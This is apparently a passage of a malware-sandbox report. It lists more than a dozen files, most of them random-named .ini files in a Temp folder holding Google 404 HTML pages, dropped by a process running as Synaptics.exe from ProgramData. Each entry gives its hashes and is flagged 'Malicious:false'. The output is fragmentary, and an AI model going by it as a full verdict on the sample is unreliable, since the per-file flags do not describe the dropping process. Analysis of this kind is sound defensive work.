                                                                                                                                                                    SSDEEP:24:GgsF+0fP+3XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6GH+pAZewRDK4mW
                                                                                                                                                                    MD5:6452A75D86F67B92279057D6D6F8366C
                                                                                                                                                                    SHA1:E536861C7ACE2FA3AC8037D8EAF439DAA05180A6
                                                                                                                                                                    SHA-256:4CD13019281A57781949FD9C323105E0668AED6A1434F9477BFBE0828A0B594E
                                                                                                                                                                    SHA-512:B9E75D6E7881AE3053A314007377857CF43FD0B09A8E22376FFB8F53BCC1D7214923A5A6332872743415E64DCB1F1E86A04D6469BC8D72FDF9DFD29D3A915AAD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7ihWK2Xnjy8Gkx9FG3BaWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mas7rnf.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2610645556926485
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0NbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0b+pAZewRDK4mW
                                                                                                                                                                    MD5:3FB3E8A40D5789445FB9BA54DD87F5E0
                                                                                                                                                                    SHA1:B93577CEB2258E26408A1F455EB0CBFF98BAFC32
                                                                                                                                                                    SHA-256:12F8118CE919450114BE6D6FAC66D466B37ABBF36206049C4E73E6FAD16EAED0
                                                                                                                                                                    SHA-512:A8E8F359EBCAD571221BF7A7D92B4EC927F32F3DF98F3856FF35D9EF09CF309A647E04E2430015AA4DEB8B7DD7C4C38CD2CFBBCDA6E254F29B2520C144DB14D0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MicuvofqGYnkvLHcV_dU3Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\oRTzXEb.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.268108386622194
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0seBSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                                                                                    MD5:33AA3D6EDDABE67E878A2245421BAA6B
                                                                                                                                                                    SHA1:AE5DE1D54E0CE7119301891191B949D57692A081
                                                                                                                                                                    SHA-256:CC62380B4505CDF6EC6B7DBF8D0F1EEB37D21751399CBCAFA502F37D134542B2
                                                                                                                                                                    SHA-512:F580E1C6376028FB239C5598EA65932D1EDB67C9A626F37EC38F41FAE9A50BF0622C45FAD2C38739E9BE25799048E14F21B7D853CEB5E33939DECAE388C395BA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NWjUKJ4_TOoWg4sMhl2Z-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qCYDNpj.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2777548675629555
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0E9nKSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+HK+pAZewRDK4mW
                                                                                                                                                                    MD5:0ADF8913D4E38FA43C77F3CA684BF2CD
                                                                                                                                                                    SHA1:525D5427D56481D0C0026AB572D8A3B40FC2B9CE
                                                                                                                                                                    SHA-256:EE0A2A1228F64506881F18AC11C2505A67A8BDE92B4FA3699B218FFC096BE819
                                                                                                                                                                    SHA-512:965271E06B96FBEEFF4C1F9CB40BC882CE4F29E299A698848A57F8B8EB9C8BBED9254D4C5BC1DB5D8B0ED9B643E69C0A36FF08DA1074278E51860FE5F27BFAEA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JCfqdkSFHOJqlNCBm7lMYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\rjHuzSR.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.257594998541933
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0USU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                                                                                    MD5:D6099B025E67E6B9DC7C80F3CFB3AAD5
                                                                                                                                                                    SHA1:D79392A1D62A305B600A7D629ABCB8B3BCAD7CEE
                                                                                                                                                                    SHA-256:EA473946C038DD750672B0517FE0DFB2400479D68CD6334F78CB7DD5540D662B
                                                                                                                                                                    SHA-512:0834C7CBC575C452B4968843FA6EA1A8C5395808FB5AA018AEB5FC05EDF5408DDC39D38C68392D88BB183EFBAE00C594869F9D3DE82DE9CF7CD3C340AC8C9BFB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MCSg4uNuwnrrE1UhpOV_bA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\rltkBNg.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2520129891956175
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0cpUCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j/+pAZewRDK4mW
                                                                                                                                                                    MD5:DACEB27A266EEEA3BAC285C1A508D25F
                                                                                                                                                                    SHA1:20E90D0DDEDAF306E8C45B663E35BD5E55DBDCE0
                                                                                                                                                                    SHA-256:8EB40CEFA9D717A241056AF6092E6504A37271149D78EE8204D801080232B8DF
                                                                                                                                                                    SHA-512:EE7C688841E091D33BFA074D83C636A8258FC5D28DBD985940935DEAE91DCEBDCE29987DE1089FF8B502AB7CFD1FA575A5AB76492BFCB0F5A7D2153D2A1F8832
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nG00jmT-h6sE2gs-DEc95A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\sWAxddF.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.251656231991704
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                                                                                    MD5:D9492897F127F6FCAF265B130FADF21D
                                                                                                                                                                    SHA1:6ACA4429CA892926618165BAE9DE8066CAD86CD9
                                                                                                                                                                    SHA-256:2D9ABD0B0868D5ED0C90D093366906411AC4B015647222E62EC5EC0F88BA05DA
                                                                                                                                                                    SHA-512:8A65E0415F38008E1D1003298A5E097FA12F33D9528576C6A7E3DA59FD4CA9493C6538E4B44A00A4B49B1CE7F4B9EDE7B5CADEFDD5FAFEC667A6C8FB89DE07A2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lbImvBkgb_ezpmZOzu3wqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\uCOgJ7x.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.255847446214183
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0o4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                                                                    MD5:51C5C260A277A7B44DEAF75523EF59F9
                                                                                                                                                                    SHA1:6B8393D03B22B1CD537DC76E6A9D6A31CFAE7B0B
                                                                                                                                                                    SHA-256:6400B74885318748F69AC940FF72C9EA48B7E1495ACE00CFDF6C4F335FB99341
                                                                                                                                                                    SHA-512:DCC19FD559C6C212F2833C98F62B8CCE4A3AB630641F1D74EA0DE2DABCF63D9146A91AEB570826362153395F1A7F70ED86868C55E30D46D871C211BB9E7BF397
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sgwehUjAQRfKN76TwagApg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\wRKiyvB.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.25661763058373
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+06jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tj+pAZewRDK4mW
                                                                                                                                                                    MD5:26F0507B0DC6D0544D71BB6E58BAB785
                                                                                                                                                                    SHA1:3ADEACE89015FEC9626231BC290B927CD0C42A9F
                                                                                                                                                                    SHA-256:FD4F4985E0D682959247FDDDCCF824610BC2D4D50085581596FE888B46B3A00F
                                                                                                                                                                    SHA-512:D53D46DA9130833247478DA3C9B9E88C5072D74101A92E7F6B1D0F1BC54AA2F3943B5972D5ECF34F6896AC477061D817EB3881D9C6CEF5E0E85F8611D1F4ACC2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HAhoabXpI2l-M_uIF7pSoA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\wtuJKNr.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.264306950689819
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0NKSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+iK+pAZewRDK4mW
                                                                                                                                                                    MD5:1C1E7CAC8701EEEC696B04230AAE2824
                                                                                                                                                                    SHA1:E942A5A295E3B717EFE531267A1F679297498B4F
                                                                                                                                                                    SHA-256:B7F47F8D38F1F7201F224E5D0A0C556CC5EBB630B1ED1F710A183F659601CBBD
                                                                                                                                                                    SHA-512:A269C56E8FCD2A55129776A9D94C96571D9CCABBAD4A53BAE29049435B33AE0A19F1E19742D76CA6B43444F7D4124E9941EA60F4166041038012C358E0B98F15
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ioB5wE9TKL-aB9IR1A3AgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\xuolacF.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.264789228479021
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0prSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ur+pAZewRDK4mW
                                                                                                                                                                    MD5:96A97EE60E4D776E4B89CDC974699DD0
                                                                                                                                                                    SHA1:0CBC0E3FB1C325026103E72859523F84A5AB874D
                                                                                                                                                                    SHA-256:2A7E6E006383F4EA604BC20D5D2D922DA428426CB2A1E18D178758A50960D937
                                                                                                                                                                    SHA-512:D42115526331E86593F5D036E505B31993A5A9CE9357216BC484E3CF631CA1465E0CA04D9A6242BF9E1FCB7E4B32F67AF47F964219FE09F2C7B0A0F643F4148B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eWOsEEXT4SiacyT_P1zCmA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\yiZjzCF.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.256751755486269
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                                                    MD5:9AAE4AACEC6849A607D2D90C34FD0555
                                                                                                                                                                    SHA1:C5107635DDEE0AACDCB36498488BC281DB0BF0D8
                                                                                                                                                                    SHA-256:C706A43E53B0537E2FD335E9D9CDDB095DA57C854BEE5F8BA1C66A8325085BA0
                                                                                                                                                                    SHA-512:2C550774C1BEDA8D8CA49B6098D81C72681D2978BEF3F45479983DEBDE9E4A83710D9CC0053BC976B4556F340FA9B1AC2957E1A25CF7C05A9A516A9895E8749C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fQF4ltuCm6aDyk2DhU0oGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\zj46DCU.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.263555790517985
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+04POdSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+jPOd+pAZewRDK4mW
                                                                                                                                                                    MD5:A54C23B4A37FC195FC6D470D192329F7
                                                                                                                                                                    SHA1:64DCD2D0C2AF49FC69C2D5580FBDA68663E897ED
                                                                                                                                                                    SHA-256:BEE5C3D6570B6A2F7936BE8CDDDA9B478DB311D877D837D2B820F4576B016A68
                                                                                                                                                                    SHA-512:702E0FE096CABC534CDE7BA2D7729ABE67E587FC3C01F5365B45E4E680054ABB68D0520F537019B360889ADC1A2AAC9DC58EF9D1EFBAA02121F2729D4F3C4348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DTY8xSmXz-kZy3lcyy0MZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\zk3HzfB.ini

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.253697888397771
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0dDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+WD+pAZewRDK4mW
                                                                                                                                                                    MD5:A3A431C22667E876DDAA7115FDD44D4A
                                                                                                                                                                    SHA1:6E8ACF509CC795C8F1043B87FD0CB2A8D88AC0BB
                                                                                                                                                                    SHA-256:490D5BF166B642891370C0C3138FED4483EFFF81EDB666B970BA5A1EB5E1B0B2
                                                                                                                                                                    SHA-512:1C74464CE1CCE1FC45CB4F446A6B16CA78B8358DCC819DAF20AF8E893C95A7C88A1C17D414ACF1D4310E37C8E4A4F5E55A2D92DD8476A934309B31CCE236541E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_bpjv_vnrtbIlYxB4hJ2Ow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2E43FD7B-E729-4283-947B-1D49591810C4}.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PNG image data, 491 x 161, 8-bit colormap, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1556
